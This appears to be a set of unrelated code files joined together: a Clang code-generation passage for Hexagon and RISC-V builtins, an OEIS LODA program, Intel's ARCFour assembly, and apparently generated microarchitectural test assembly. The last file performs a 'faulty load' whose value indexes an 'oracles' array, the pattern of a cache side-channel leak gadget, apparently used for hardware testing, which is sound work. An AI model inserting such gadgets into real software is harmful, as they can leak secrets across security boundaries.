llvm_unreachable("unexpected builtin ID");
}
Function *Callee = CGM.getIntrinsic(IntNo);
return Builder.CreateCall(Callee, {Vec});
}
default:
return nullptr;
}
}
static std::pair<Intrinsic::ID, unsigned>
getIntrinsicForHexagonNonGCCBuiltin(unsigned BuiltinID) {
struct Info {
unsigned BuiltinID;
Intrinsic::ID IntrinsicID;
unsigned VecLen;
};
Info Infos[] = {
#define CUSTOM_BUILTIN_MAPPING(x,s) \
{ Hexagon::BI__builtin_HEXAGON_##x, Intrinsic::hexagon_##x, s },
CUSTOM_BUILTIN_MAPPING(L2_loadrub_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrb_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadruh_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrh_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadri_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrd_pci, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrub_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrb_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadruh_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrh_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadri_pcr, 0)
CUSTOM_BUILTIN_MAPPING(L2_loadrd_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerb_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerh_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerf_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storeri_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerd_pci, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerb_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerh_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerf_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storeri_pcr, 0)
CUSTOM_BUILTIN_MAPPING(S2_storerd_pcr, 0)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstoreq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorenq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentnq, 64)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstoreq_128B, 128)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorenq_128B, 128)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentq_128B, 128)
CUSTOM_BUILTIN_MAPPING(V6_vmaskedstorentnq_128B, 128)
#include "clang/Basic/BuiltinsHexagonMapCustomDep.def"
#undef CUSTOM_BUILTIN_MAPPING
};
auto CmpInfo = [] (Info A, Info B) { return A.BuiltinID < B.BuiltinID; };
static const bool SortOnce = (llvm::sort(Infos, CmpInfo), true);
(void)SortOnce;
const Info *F = std::lower_bound(std::begin(Infos), std::end(Infos),
Info{BuiltinID, 0, 0}, CmpInfo);
if (F == std::end(Infos) || F->BuiltinID != BuiltinID)
return {Intrinsic::not_intrinsic, 0};
return {F->IntrinsicID, F->VecLen};
}
Value *CodeGenFunction::EmitHexagonBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
Intrinsic::ID ID;
unsigned VecLen;
std::tie(ID, VecLen) = getIntrinsicForHexagonNonGCCBuiltin(BuiltinID);
auto MakeCircOp = [this, E](unsigned IntID, bool IsLoad) {
// The base pointer is passed by address, so it needs to be loaded.
Address A = EmitPointerWithAlignment(E->getArg(0));
Address BP = Address(
Builder.CreateBitCast(A.getPointer(), Int8PtrPtrTy), A.getAlignment());
llvm::Value *Base = Builder.CreateLoad(BP);
// The treatment of both loads and stores is the same: the arguments for
// the builtin are the same as the arguments for the intrinsic.
// Load:
// builtin(Base, Inc, Mod, Start) -> intr(Base, Inc, Mod, Start)
// builtin(Base, Mod, Start) -> intr(Base, Mod, Start)
// Store:
// builtin(Base, Inc, Mod, Val, Start) -> intr(Base, Inc, Mod, Val, Start)
// builtin(Base, Mod, Val, Start) -> intr(Base, Mod, Val, Start)
SmallVector<llvm::Value*,5> Ops = { Base };
for (unsigned i = 1, e = E->getNumArgs(); i != e; ++i)
Ops.push_back(EmitScalarExpr(E->getArg(i)));
llvm::Value *Result = Builder.CreateCall(CGM.getIntrinsic(IntID), Ops);
// The load intrinsics generate two results (Value, NewBase), stores
// generate one (NewBase). The new base address needs to be stored.
llvm::Value *NewBase = IsLoad ? Builder.CreateExtractValue(Result, 1)
: Result;
llvm::Value *LV = Builder.CreateBitCast(
EmitScalarExpr(E->getArg(0)), NewBase->getType()->getPointerTo());
Address Dest = EmitPointerWithAlignment(E->getArg(0));
llvm::Value *RetVal =
Builder.CreateAlignedStore(NewBase, LV, Dest.getAlignment());
if (IsLoad)
RetVal = Builder.CreateExtractValue(Result, 0);
return RetVal;
};
// Handle the conversion of bit-reverse load intrinsics to bit code.
// The intrinsic call after this function only reads from memory and the
// write to memory is dealt by the store instruction.
auto MakeBrevLd = [this, E](unsigned IntID, llvm::Type *DestTy) {
// The intrinsic generates one result, which is the new value for the base
// pointer. It needs to be returned. The result of the load instruction is
// passed to intrinsic by address, so the value needs to be stored.
llvm::Value *BaseAddress =
Builder.CreateBitCast(EmitScalarExpr(E->getArg(0)), Int8PtrTy);
// Expressions like &(*pt++) will be incremented per evaluation.
// EmitPointerWithAlignment and EmitScalarExpr evaluates the expression
// per call.
Address DestAddr = EmitPointerWithAlignment(E->getArg(1));
DestAddr = Address(Builder.CreateBitCast(DestAddr.getPointer(), Int8PtrTy),
DestAddr.getAlignment());
llvm::Value *DestAddress = DestAddr.getPointer();
// Operands are Base, Dest, Modifier.
// The intrinsic format in LLVM IR is defined as
// { ValueType, i8* } (i8*, i32).
llvm::Value *Result = Builder.CreateCall(
CGM.getIntrinsic(IntID), {BaseAddress, EmitScalarExpr(E->getArg(2))});
// The value needs to be stored as the variable is passed by reference.
llvm::Value *DestVal = Builder.CreateExtractValue(Result, 0);
// The store needs to be truncated to fit the destination type.
// While i32 and i64 are natively supported on Hexagon, i8 and i16 needs
// to be handled with stores of respective destination type.
DestVal = Builder.CreateTrunc(DestVal, DestTy);
llvm::Value *DestForStore =
Builder.CreateBitCast(DestAddress, DestVal->getType()->getPointerTo());
Builder.CreateAlignedStore(DestVal, DestForStore, DestAddr.getAlignment());
// The updated value of the base pointer is returned.
return Builder.CreateExtractValue(Result, 1);
};
auto V2Q = [this, VecLen] (llvm::Value *Vec) {
Intrinsic::ID ID = VecLen == 128 ? Intrinsic::hexagon_V6_vandvrt_128B
: Intrinsic::hexagon_V6_vandvrt;
return Builder.CreateCall(CGM.getIntrinsic(ID),
{Vec, Builder.getInt32(-1)});
};
auto Q2V = [this, VecLen] (llvm::Value *Pred) {
Intrinsic::ID ID = VecLen == 128 ? Intrinsic::hexagon_V6_vandqrt_128B
: Intrinsic::hexagon_V6_vandqrt;
return Builder.CreateCall(CGM.getIntrinsic(ID),
{Pred, Builder.getInt32(-1)});
};
switch (BuiltinID) {
// These intrinsics return a tuple {Vector, VectorPred} in LLVM IR,
// and the corresponding C/C++ builtins use loads/stores to update
// the predicate.
case Hexagon::BI__builtin_HEXAGON_V6_vaddcarry:
case Hexagon::BI__builtin_HEXAGON_V6_vaddcarry_128B:
case Hexagon::BI__builtin_HEXAGON_V6_vsubcarry:
case Hexagon::BI__builtin_HEXAGON_V6_vsubcarry_128B: {
// Get the type from the 0-th argument.
llvm::Type *VecType = ConvertType(E->getArg(0)->getType());
Address PredAddr = Builder.CreateBitCast(
EmitPointerWithAlignment(E->getArg(2)), VecType->getPointerTo(0));
llvm::Value *PredIn = V2Q(Builder.CreateLoad(PredAddr));
llvm::Value *Result = Builder.CreateCall(CGM.getIntrinsic(ID),
{EmitScalarExpr(E->getArg(0)), EmitScalarExpr(E->getArg(1)), PredIn});
llvm::Value *PredOut = Builder.CreateExtractValue(Result, 1);
Builder.CreateAlignedStore(Q2V(PredOut), PredAddr.getPointer(),
PredAddr.getAlignment());
return Builder.CreateExtractValue(Result, 0);
}
case Hexagon::BI__builtin_HEXAGON_L2_loadrub_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrb_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadruh_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrh_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadri_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrd_pci:
case Hexagon::BI__builtin_HEXAGON_L2_loadrub_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadrb_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadruh_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadrh_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadri_pcr:
case Hexagon::BI__builtin_HEXAGON_L2_loadrd_pcr:
return MakeCircOp(ID, /*IsLoad=*/true);
case Hexagon::BI__builtin_HEXAGON_S2_storerb_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerh_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerf_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storeri_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerd_pci:
case Hexagon::BI__builtin_HEXAGON_S2_storerb_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storerh_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storerf_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storeri_pcr:
case Hexagon::BI__builtin_HEXAGON_S2_storerd_pcr:
return MakeCircOp(ID, /*IsLoad=*/false);
case Hexagon::BI__builtin_brev_ldub:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrub_pbr, Int8Ty);
case Hexagon::BI__builtin_brev_ldb:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrb_pbr, Int8Ty);
case Hexagon::BI__builtin_brev_lduh:
return MakeBrevLd(Intrinsic::hexagon_L2_loadruh_pbr, Int16Ty);
case Hexagon::BI__builtin_brev_ldh:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrh_pbr, Int16Ty);
case Hexagon::BI__builtin_brev_ldw:
return MakeBrevLd(Intrinsic::hexagon_L2_loadri_pbr, Int32Ty);
case Hexagon::BI__builtin_brev_ldd:
return MakeBrevLd(Intrinsic::hexagon_L2_loadrd_pbr, Int64Ty);
default: {
if (ID == Intrinsic::not_intrinsic)
return nullptr;
auto IsVectorPredTy = [](llvm::Type *T) {
return T->isVectorTy() &&
cast<llvm::VectorType>(T)->getElementType()->isIntegerTy(1);
};
llvm::Function *IntrFn = CGM.getIntrinsic(ID);
llvm::FunctionType *IntrTy = IntrFn->getFunctionType();
SmallVector<llvm::Value*,4> Ops;
for (unsigned i = 0, e = IntrTy->getNumParams(); i != e; ++i) {
llvm::Type *T = IntrTy->getParamType(i);
const Expr *A = E->getArg(i);
if (IsVectorPredTy(T)) {
// There will be an implicit cast to a boolean vector. Strip it.
if (auto *Cast = dyn_cast<ImplicitCastExpr>(A)) {
if (Cast->getCastKind() == CK_BitCast)
A = Cast->getSubExpr();
}
Ops.push_back(V2Q(EmitScalarExpr(A)));
} else {
Ops.push_back(EmitScalarExpr(A));
}
}
llvm::Value *Call = Builder.CreateCall(IntrFn, Ops);
if (IsVectorPredTy(IntrTy->getReturnType()))
Call = Q2V(Call);
return Call;
} // default
} // switch
return nullptr;
}
RValue CodeGenFunction::EmitIntelFPGARegBuiltin(const CallExpr *E,
ReturnValueSlot ReturnValue) {
const Expr *PtrArg = E->getArg(0);
QualType ArgType = PtrArg->getType();
StringRef AnnotStr = "__builtin_intel_fpga_reg";
if (ArgType->isRecordType()) {
Address DstAddr = ReturnValue.getValue();
EmitAnyExprToMem(PtrArg, DstAddr, ArgType.getQualifiers(), true);
Address A =
EmitIntelFPGAFieldAnnotations(E->getExprLoc(), DstAddr, AnnotStr);
return RValue::getAggregate(A);
}
// if scalar type
llvm::Value *V = EmitScalarExpr(PtrArg);
// llvm.annotation does not accept anything but integer types.
llvm::Type *OrigVType = V->getType();
if (!OrigVType->isIntegerTy()) {
IntegerType *IntTy =
Builder.getIntNTy(CGM.getDataLayout().getTypeSizeInBits(OrigVType));
V = Builder.CreateBitOrPointerCast(V, IntTy);
}
llvm::Function *F = CGM.getIntrinsic(llvm::Intrinsic::annotation,
V->getType());
llvm::Value *AnnotatedV =
EmitAnnotationCall(F, V, AnnotStr, E->getExprLoc());
if (AnnotatedV->getType() != OrigVType) {
AnnotatedV = Builder.CreateBitOrPointerCast(AnnotatedV, OrigVType);
}
return RValue::get(AnnotatedV);
}
RValue CodeGenFunction::EmitIntelFPGAMemBuiltin(const CallExpr *E) {
// Arguments
const Expr *PtrArg = E->getArg(0);
Value *PtrVal = EmitScalarExpr(PtrArg);
// Create the pointer annotation
Function *F =
CGM.getIntrinsic(llvm::Intrinsic::ptr_annotation, PtrVal->getType());
SmallString<256> AnnotStr;
llvm::raw_svector_ostream Out(AnnotStr);
Optional<llvm::APSInt> Params =
E->getArg(1)->getIntegerConstantExpr(getContext());
assert(Params.hasValue() && "Constant arg isn't actually constant?");
Out << "{params:" << toString(*Params, 10) << "}";
Optional<llvm::APSInt> CacheSize =
E->getArg(2)->getIntegerConstantExpr(getContext());
assert(CacheSize.hasValue() && "Constant arg isn't actually constant?");
Out << "{cache-size:" << toString(*CacheSize, 10) << "}";
llvm::Value *Ann = EmitAnnotationCall(F, PtrVal, AnnotStr, SourceLocation());
cast<CallBase>(Ann)->addFnAttr(llvm::Attribute::ReadNone);
return RValue::get(Ann);
}
Value *CodeGenFunction::EmitRISCVBuiltinExpr(unsigned BuiltinID,
const CallExpr *E,
ReturnValueSlot ReturnValue) {
SmallVector<Value *, 4> Ops;
llvm::Type *ResultType = ConvertType(E->getType());
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++)
Ops.push_back(EmitScalarExpr(E->getArg(i)));
Intrinsic::ID ID = Intrinsic::not_intrinsic;
unsigned NF = 1;
constexpr unsigned TAIL_UNDISTURBED = 0;
// Required for overloaded intrinsics.
llvm::SmallVector<llvm::Type *, 2> IntrinsicTypes;
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin ID");
case RISCV::BI__builtin_riscv_orc_b_32:
case RISCV::BI__builtin_riscv_orc_b_64:
case RISCV::BI__builtin_riscv_clmul:
case RISCV::BI__builtin_riscv_clmulh:
case RISCV::BI__builtin_riscv_clmulr:
case RISCV::BI__builtin_riscv_bcompress_32:
case RISCV::BI__builtin_riscv_bcompress_64:
case RISCV::BI__builtin_riscv_bdecompress_32:
case RISCV::BI__builtin_riscv_bdecompress_64:
case RISCV::BI__builtin_riscv_grev_32:
case RISCV::BI__builtin_riscv_grev_64:
case RISCV::BI__builtin_riscv_gorc_32:
case RISCV::BI__builtin_riscv_gorc_64:
case RISCV::BI__builtin_riscv_shfl_32:
case RISCV::BI__builtin_riscv_shfl_64:
case RISCV::BI__builtin_riscv_unshfl_32:
case RISCV::BI__builtin_riscv_unshfl_64:
case RISCV::BI__builtin_riscv_xperm_n:
case RISCV::BI__builtin_riscv_xperm_b:
case RISCV::BI__builtin_riscv_xperm_h:
case RISCV::BI__builtin_riscv_xperm_w:
case RISCV::BI__builtin_riscv_crc32_b:
case RISCV::BI__builtin_riscv_crc32_h:
case RISCV::BI__builtin_riscv_crc32_w:
case RISCV::BI__builtin_riscv_crc32_d:
case RISCV::BI__builtin_riscv_crc32c_b:
case RISCV::BI__builtin_riscv_crc32c_h:
case RISCV::BI__builtin_riscv_crc32c_w:
case RISCV::BI__builtin_riscv_crc32c_d: {
switch (BuiltinID) {
default: llvm_unreachable("unexpected builtin ID");
// Zbb
case RISCV::BI__builtin_riscv_orc_b_32:
case RISCV::BI__builtin_riscv_orc_b_64:
ID = Intrinsic::riscv_orc_b;
break;
// Zbc
case RISCV::BI__builtin_riscv_clmul:
ID = Intrinsic::riscv_clmul;
break;
case RISCV::BI__builtin_riscv_clmulh:
ID = Intrinsic::riscv_clmulh;
break;
case RISCV::BI__builtin_riscv_clmulr:
ID = Intrinsic::riscv_clmulr;
break;
// Zbe
case RISCV::BI__builtin_riscv_bcompress_32:
case RISCV::BI__builtin_riscv_bcompress_64:
ID = Intrinsic::riscv_bcompress;
break;
case RISCV::BI__builtin_riscv_bdecompress_32:
case RISCV::BI__builtin_riscv_bdecompress_64:
ID = Intrinsic::riscv_bdecompress;
break;
// Zbp
case RISCV::BI__builtin_riscv_grev_32:
case RISCV::BI__builtin_riscv_grev_64:
ID = Intrinsic::riscv_grev;
break;
case RISCV::BI__builtin_riscv_gorc_32:
case RISCV::BI__builtin_riscv_gorc_64:
ID = Intrinsic::riscv_gorc;
break;
case RISCV::BI__builtin_riscv_shfl_32:
case RISCV::BI__builtin_riscv_shfl_64:
ID = Intrinsic::riscv_shfl;
break;
case RISCV::BI__builtin_riscv_unshfl_32:
case RISCV::BI__builtin_riscv_unshfl_64:
ID = Intrinsic::riscv_unshfl;
break;
case RISCV::BI__builtin_riscv_xperm_n:
ID = Intrinsic::riscv_xperm_n;
break;
case RISCV::BI__builtin_riscv_xperm_b:
ID = Intrinsic::riscv_xperm_b;
break;
case RISCV::BI__builtin_riscv_xperm_h:
ID = Intrinsic::riscv_xperm_h;
break;
case RISCV::BI__builtin_riscv_xperm_w:
ID = Intrinsic::riscv_xperm_w;
break;
// Zbr
case RISCV::BI__builtin_riscv_crc32_b:
ID = Intrinsic::riscv_crc32_b;
break;
case RISCV::BI__builtin_riscv_crc32_h:
ID = Intrinsic::riscv_crc32_h;
break;
case RISCV::BI__builtin_riscv_crc32_w:
ID = Intrinsic::riscv_crc32_w;
break;
case RISCV::BI__builtin_riscv_crc32_d:
ID = Intrinsic::riscv_crc32_d;
break;
case RISCV::BI__builtin_riscv_crc32c_b:
ID = Intrinsic::riscv_crc32c_b;
break;
case RISCV::BI__builtin_riscv_crc32c_h:
ID = Intrinsic::riscv_crc32c_h;
break;
case RISCV::BI__builtin_riscv_crc32c_w:
ID = Intrinsic::riscv_crc32c_w;
break;
case RISCV::BI__builtin_riscv_crc32c_d:
ID = Intrinsic::riscv_crc32c_d;
break;
}
IntrinsicTypes = {ResultType};
break;
}
// Vector builtins are handled from here.
#include "clang/Basic/riscv_vector_builtin_cg.inc"
}
assert(ID != Intrinsic::not_intrinsic);
llvm::Function *F = CGM.getIntrinsic(ID, IntrinsicTypes);
return Builder.CreateCall(F, Ops, "");
}
|
; A317331: Indices m for which A058304(m) = 1.
; 4,8,11,16,20,23,27,32,36,40,43,47,52,55,59,64,68,72,75,80,84,87,91,95,100,104,107,111,116,119,123,128,132,136,139,144,148,151,155,160,164,168,171,175,180,183,187,191,196,200,203,208,212,215,219,223,228,232,235,239,244,247,251,256,260,264,267,272,276,279,283,288,292,296,299,303,308,311,315,320,324,328,331,336,340,343,347,351,356,360,363,367,372,375,379,383,388,392,395,400,404,407,411,416,420,424,427,431,436,439,443,447,452,456,459,464,468,471,475,479,484,488,491,495,500,503,507,512,516,520,523,528,532,535,539,544,548,552,555,559,564,567,571,576,580,584,587,592,596,599,603,607,612,616,619,623,628,631,635,640,644,648,651,656,660,663,667,672,676,680,683,687,692,695,699,703,708,712,715,720,724,727,731,735,740,744,747,751,756,759,763,767,772,776,779,784,788,791,795,800,804,808,811,815,820,823,827,832,836,840,843,848,852,855,859,863,868,872,875,879,884,887,891,895,900,904,907,912,916,919,923,928,932,936,939,943,948,951,955,959,964,968,971,976,980,983,987,991,996,1000
mov $6,$0
mul $0,2
mov $2,$0
mov $4,1
lpb $2
mov $0,2
div $2,2
add $2,1
lpb $4
trn $4,$2
add $5,1
lpe
mov $4,$2
mod $4,$0
lpb $5
mov $2,1
mov $5,1
lpe
sub $2,1
lpe
add $4,5
mov $1,$4
sub $1,2
mov $3,$6
mul $3,4
add $1,$3
|
###############################################################################
# Copyright 2018 Intel Corporation
# All Rights Reserved.
#
# If this software was obtained under the Intel Simplified Software License,
# the following terms apply:
#
# The source code, information and material ("Material") contained herein is
# owned by Intel Corporation or its suppliers or licensors, and title to such
# Material remains with Intel Corporation or its suppliers or licensors. The
# Material contains proprietary information of Intel or its suppliers and
# licensors. The Material is protected by worldwide copyright laws and treaty
# provisions. No part of the Material may be used, copied, reproduced,
# modified, published, uploaded, posted, transmitted, distributed or disclosed
# in any way without Intel's prior express written permission. No license under
# any patent, copyright or other intellectual property rights in the Material
# is granted to or conferred upon you, either expressly, by implication,
# inducement, estoppel or otherwise. Any license under such intellectual
# property rights must be express and approved by Intel in writing.
#
# Unless otherwise agreed by Intel in writing, you may not remove or alter this
# notice or any other notice embedded in Materials by Intel or Intel's
# suppliers or licensors in any way.
#
#
# If this software was obtained under the Apache License, Version 2.0 (the
# "License"), the following terms apply:
#
# You may not use this file except in compliance with the License. You may
# obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
.section .note.GNU-stack,"",%progbits
.text
.p2align 4, 0x90
.globl m7_ARCFourProcessData
.type m7_ARCFourProcessData, @function
m7_ARCFourProcessData:
push %rbx
push %rbp
movslq %edx, %r8
test %r8, %r8
mov %rcx, %rbp
jz .Lquitgas_1
movzbq (4)(%rbp), %rax
movzbq (8)(%rbp), %rbx
lea (12)(%rbp), %rbp
add $(1), %rax
movzbq %al, %rax
movzbq (%rbp,%rax,4), %rcx
.p2align 4, 0x90
.Lmain_loopgas_1:
add %rcx, %rbx
movzbq %bl, %rbx
add $(1), %rdi
add $(1), %rsi
movzbq (%rbp,%rbx,4), %rdx
movl %ecx, (%rbp,%rbx,4)
add %rdx, %rcx
movzbq %cl, %rcx
movl %edx, (%rbp,%rax,4)
movb (%rbp,%rcx,4), %dl
add $(1), %rax
movzbq %al, %rax
xorb (-1)(%rdi), %dl
sub $(1), %r8
movzbq (%rbp,%rax,4), %rcx
movb %dl, (-1)(%rsi)
jne .Lmain_loopgas_1
lea (-12)(%rbp), %rbp
sub $(1), %rax
movzbq %al, %rax
movl %eax, (4)(%rbp)
movl %ebx, (8)(%rbp)
.Lquitgas_1:
pop %rbp
pop %rbx
ret
.Lfe1:
.size m7_ARCFourProcessData, .Lfe1-(m7_ARCFourProcessData)
|
.global s_prepare_buffers
s_prepare_buffers:
push %r11
push %r12
push %r13
push %r14
push %r15
push %r9
push %rdi
lea addresses_WC_ht+0x1e31d, %rdi
nop
nop
nop
add $54954, %r9
vmovups (%rdi), %ymm3
vextracti128 $0, %ymm3, %xmm3
vpextrq $1, %xmm3, %r12
cmp $36469, %r15
lea addresses_WC_ht+0x11eeb, %r11
nop
nop
nop
nop
lfence
movb (%r11), %r13b
nop
nop
nop
sub %r12, %r12
lea addresses_WC_ht+0x1773b, %r12
clflush (%r12)
nop
nop
nop
xor %r14, %r14
movb (%r12), %r13b
nop
nop
nop
sub $49510, %r14
lea addresses_normal_ht+0x14a3b, %r9
nop
nop
and $4537, %r11
movl $0x61626364, (%r9)
nop
nop
sub $62081, %r12
lea addresses_normal_ht+0x1953b, %r11
nop
nop
nop
and $19196, %r13
movups (%r11), %xmm4
vpextrq $1, %xmm4, %r15
nop
nop
nop
xor %r11, %r11
pop %rdi
pop %r9
pop %r15
pop %r14
pop %r13
pop %r12
pop %r11
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r14
push %r8
push %rax
push %rbp
push %rcx
push %rdi
// Store
lea addresses_UC+0xe09b, %rdi
nop
nop
nop
nop
nop
cmp $20142, %rbp
movb $0x51, (%rdi)
nop
nop
nop
nop
and %rcx, %rcx
// Store
lea addresses_D+0x1b061, %rdi
clflush (%rdi)
sub %r14, %r14
mov $0x5152535455565758, %r8
movq %r8, (%rdi)
sub $7030, %rax
// Store
lea addresses_UC+0x13f0b, %r14
clflush (%r14)
nop
nop
nop
add %r11, %r11
movb $0x51, (%r14)
and $34024, %r8
// Faulty Load
lea addresses_US+0x15f3b, %r14
and $12538, %rcx
movaps (%r14), %xmm7
vpextrq $1, %xmm7, %rdi
lea oracles, %r14
and $0xff, %rdi
shlq $12, %rdi
mov (%r14,%rdi,1), %rdi
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r8
pop %r14
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 5, 'NT': False, 'type': 'addresses_UC', 'size': 1, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_D', 'size': 8, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 4, 'NT': False, 'type': 'addresses_UC', 'size': 1, 'AVXalign': False}}
[Faulty Load]
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 16, 'AVXalign': True}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'same': False, 'congruent': 1, 'NT': False, 'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': True}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_normal_ht', 'size': 4, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
{'44': 6101, '00': 14284, '48': 1444}
44 44 00 00 00 00 00 00 00 00 00 00 44 44 00 00 00 00 00 00 48 48 00 00 00 44 00 44 00 00 00 00 00 00 44 44 00 00 44 00 00 00 44 44 00 00 00 44 00 44 00 00 00 00 44 00 00 00 48 00 00 44 00 00 00 00 00 00 48 44 00 00 00 00 00 00 00 00 00 00 00 44 48 44 44 44 00 00 48 44 00 00 00 44 48 00 00 48 44 00 00 00 00 44 00 00 48 00 00 00 44 00 44 00 00 00 00 44 00 00 00 00 44 44 00 00 44 00 00 00 00 00 48 44 44 44 44 44 00 44 00 44 44 00 00 00 00 00 00 44 00 00 00 48 00 00 00 44 44 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 44 00 44 44 00 48 44 00 00 44 44 00 00 00 00 00 00 00 00 00 00 00 44 44 00 00 00 44 00 44 00 44 00 00 00 00 44 00 44 00 00 00 00 00 44 00 00 44 44 00 44 00 00 48 44 00 00 44 00 00 44 00 00 00 00 00 00 44 00 00 00 00 00 44 44 44 44 00 00 00 00 00 44 00 00 44 00 44 00 44 00 00 00 00 00 00 00 00 00 44 00 00 00 44 44 00 00 00 44 44 00 00 44 44 00 00 00 00 00 48 44 44 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 00 44 00 00 00 00 00 44 00 00 44 00 48 44 48 44 44 44 00 00 44 00 00 00 00 44 00 44 00 44 00 48 44 00 00 00 44 44 00 00 00 44 00 00 44 00 44 44 00 44 44 44 00 44 00 00 00 00 00 00 00 44 48 44 00 44 00 00 00 00 00 44 44 00 44 00 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 48 00 00 00 44 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 44 44 44 00 00 44 00 44 00 48 00 48 00 00 00 00 48 00 00 00 00 00 44 00 44 00 00 48 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 48 44 44 00 00 00 00 00 00 00 00 00 44 44 00 00 00 00 00 00 44 00 44 00 44 44 00 44 48 00 00 00 00 00 00 00 00 48 00 00 44 00 00 44 44 00 00 00 00 00 44 00 00 00 00 00 00 44 00 00 00 48 44 00 00 00 00 44 44 44 00 48 44 44 00 00 00 00 00 00 00 00 00 44 44 00 44 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 44 44 00 00 48 44 44 00 44 44 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 48 00 00 00 00 00 00 00 00 00 48 00 00 00 48 44 48 00 00 00 00 44 44 48 00 48 44 44 44 00 48 44 00 00 48 00 00 00 00 00 44 44 44 44 00 00 00 44 44 00 00 48 44 44 00 44 00 44 00 00 00 44 44 00 00 00 44 00 00 00 48 44 00 00 00 44 00 44 00 44 00 44 00 48 44 00 00 44 48 44 00 48 44 00 00 00 48 44 44 00 00 00 00 44 44 00 00 00 00 00 00 44 44 00 00 00 44 00 00 00 44 44 00 44 44 00 00 44 00 00 48 44 44 00 48 00 44 00 00 44 44 44 00 00 00 00 00 44 00 48 00 48 00 00 00 44 00 00 00 00 44 00 00 00 00 48 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 48 44 48 44 44 44 00 00 00 00 00 48 00 00 00 44 00 00 48 44 00 44 44 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 44 44 44 00 00 44 44 00 00 00 00 00 00 00 44 00 44 00 00 00 00 00 44 48 44 00 00 48 00 00 00 48 00 44 44 44 00 00 44 44 00 00 00 44 44 44 00 00 00 00 48 44 48 44 00 48 00 00 00 00 00 00 00 44 00 00 00 00 00 44 44 44 00 44 00 00 00 00 00 